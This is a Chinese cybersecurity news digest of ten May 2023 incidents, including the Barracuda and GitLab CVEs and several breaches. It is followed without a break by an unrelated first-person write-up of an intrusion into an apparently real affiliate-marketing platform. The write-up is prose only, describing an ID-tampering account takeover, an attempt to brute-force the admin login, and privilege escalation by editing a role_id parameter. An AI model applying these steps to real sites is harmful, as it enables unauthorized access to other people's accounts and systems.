1、巴西黑客瞄准葡萄牙金融机构发起攻击 https://cyberscoop.com/brazilian-hackers-portuguese-banks/ 巴西黑客利用一种名为Grandoreiro的恶意软件，针对葡萄牙的30多家金融机构的客户发动攻击，该软件可以远程控制受害者的浏览器，诱骗他们输入银行凭证或保持会话活跃，从而窃取或转移资金。 2、Barracuda电子邮件安全网关遭遇零日漏洞攻击 https://www.helpnetsecurity.com/2023/05/25/cve-2023-2868/ Barracuda电子邮件安全网关是一种用于保护企业邮箱的设备，它可以阻止垃圾邮件、恶意软件和网络钓鱼等威胁。但是，该设备存在一个严重的远程命令注入漏洞(CVE-2023-2868)，该漏洞已被黑客利用来入侵并控制设备。该漏洞只影响物理设备，不影响虚拟或云端设备。Barracuda已经发布了安全更新来修复该漏洞，并建议用户尽快升级。并且研究人员对该漏洞的利用方式和影响范围，以及如何检测和恢复被入侵的设备进行了分析。 3、Point32Health确认勒索软件攻击泄露会员数据 https://www.hipaajournal.com/point32health-confirms-harvard-pilgrim-health-care-member-data-stolen-in-ransomware-attack/ Point32Health是美国马萨诸塞州第二大健康保险公司，也是Tufts Health Plan和Harvard Pilgrim Health Care的母公司。该公司在2023年4月遭到了一场勒索软件攻击，导致部分系统被迫下线，并影响了Harvard Pilgrim Health Care的部分会员服务。 4、Apria Healthcare披露影响180万用户的重大数据泄露 https://www.hackread.com/apria-healthcare-major-data-breach/ Apria Healthcare是一家提供居家医疗服务和设备的公司，它在2023年2月遭到了一场网络攻击，导致其部分系统被入侵，并泄露了180万用户的个人信息。这些信息包括姓名、地址、电话号码、电子邮件地址、社会安全号码、医疗保险号码、医疗记录号码、诊断信息、治疗信息和处方信息等。 5、乘客信息泄露！网站、App瘫痪！SAS航空公司再次遭黑客入侵 https://cybernews.com/security/sas-airlines-cyber-attack-pro-russian-anonymous-sudan-again/ 据报道，斯堪的纳维亚航空公司今年第二次被亲俄罗斯的黑客组织 "匿名苏丹 "攻破，导致SAS网站和其航空公司的应用程序瘫痪数小时。 6、强烈建议修复！GitLab 曝“史上最大缺陷”漏洞 https://www.freebuf.com/news/367499.html GitLab 发布了 16.0.1 版紧急安全更新，以解决被追踪为 CVE-2023-2825 的严重性（CVSS v3.1 评分：10.0）路径遍历漏洞。 7、《商用密码管理条例》7月1日施行 https://www.freebuf.com/news/367487.html 据中国政府网消息，《商用密码管理条例》已经2023年4月14日国务院第4次常务会议修订通过，现予公布，自2023年7月1日起施行。 8、TikTok将允许Oracle查看源代码、算法和内容审核 https://www.theregister.com/2023/05/23/tiktok_offers_oracle_view_of/ 美国约有1.5亿人使用的社交视频平台TikTok将向甲骨文公司(Oracle)提供其源代码、算法和内容审核材料，以减轻美国国内对数据保护和国家安全的担忧。 9、以色列物流业遭遇大规模网络攻击 https://www.freebuf.com/news/367502.html 近日，伊朗黑客组织Tortoiseshell盯上了以色列航运、物流和金融服务公司，至少有8家公司的相关网站遭遇了水坑攻击。 10、免费VPN服务SuperVPN泄露了3.6亿条用户记录 https://www.hackread.com/free-vpn-service-supervpn-leaks-user-records/ 在最近的一次网络安全事件中，安全研究员Jeremiah Fowler发现SuperVPN相关的非密码保护数据库中发现了重大数据泄露事件。公开的数据库包含惊人的 360，308，817 条记录，总大小为 133 GB。这些记录包括广泛的敏感信息，包括用户电子邮件地址、原始 IP 地址、地理位置数据和服务器使用记录。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言： 闲来无事，在群里发现有人推这玩意，一看居然是个cps平台 这就有意思了 我们先去找大哥开一个代理账号 拿到账号之后，登录看看 js也看了下没啥东西，套了cdn，也没上传点 可以添加下级渠道，尝试添加 添加抓包看看 是能添加，添加的时候会返回用户详细参数对吧 点击修改抓包看看，没返回数据 在修改看看 这里127.0.0.1是我没登录这个账号，所以没获取我的ip 然后可以看到pk这个参数是不是对应的返回参数的id 我们尝试修改id越权别的用户id（赌的就是他没做检测，赌的就是他id是遍历的） 首先我们把不用的参数删掉，看看能不能返回，不然修改了别人就容易被发现 正常返回，然后我们在随机改一个 可以没毛病，那么我们改成id是1的，id为1基本上都是管理员 获取了管理员账号开始爆破试下（失败告终） 然后我发现，发过去的参数能和返回的参数对得上 我就想看能不能改 这里我们的role_id是4对吧 我们改成1发包看下 还真可以，roleid就是用户权限组 我们直接登录我们添加的那个账号看看 Ok，成功上去了，由于上传都是强制转换成png格式，我就懒得研究了 总结： 有些开发会偷懒，把后台添加用户（包含管理员）用一个接口，但后台功能肯定是全面的，但还是同一个接口，为了偷懒把前台用户也用这个接口，只是明面上把东西进行阉割处理，但只要进行正确的传参还是可以的，当然这个有运气成分，侥幸而已。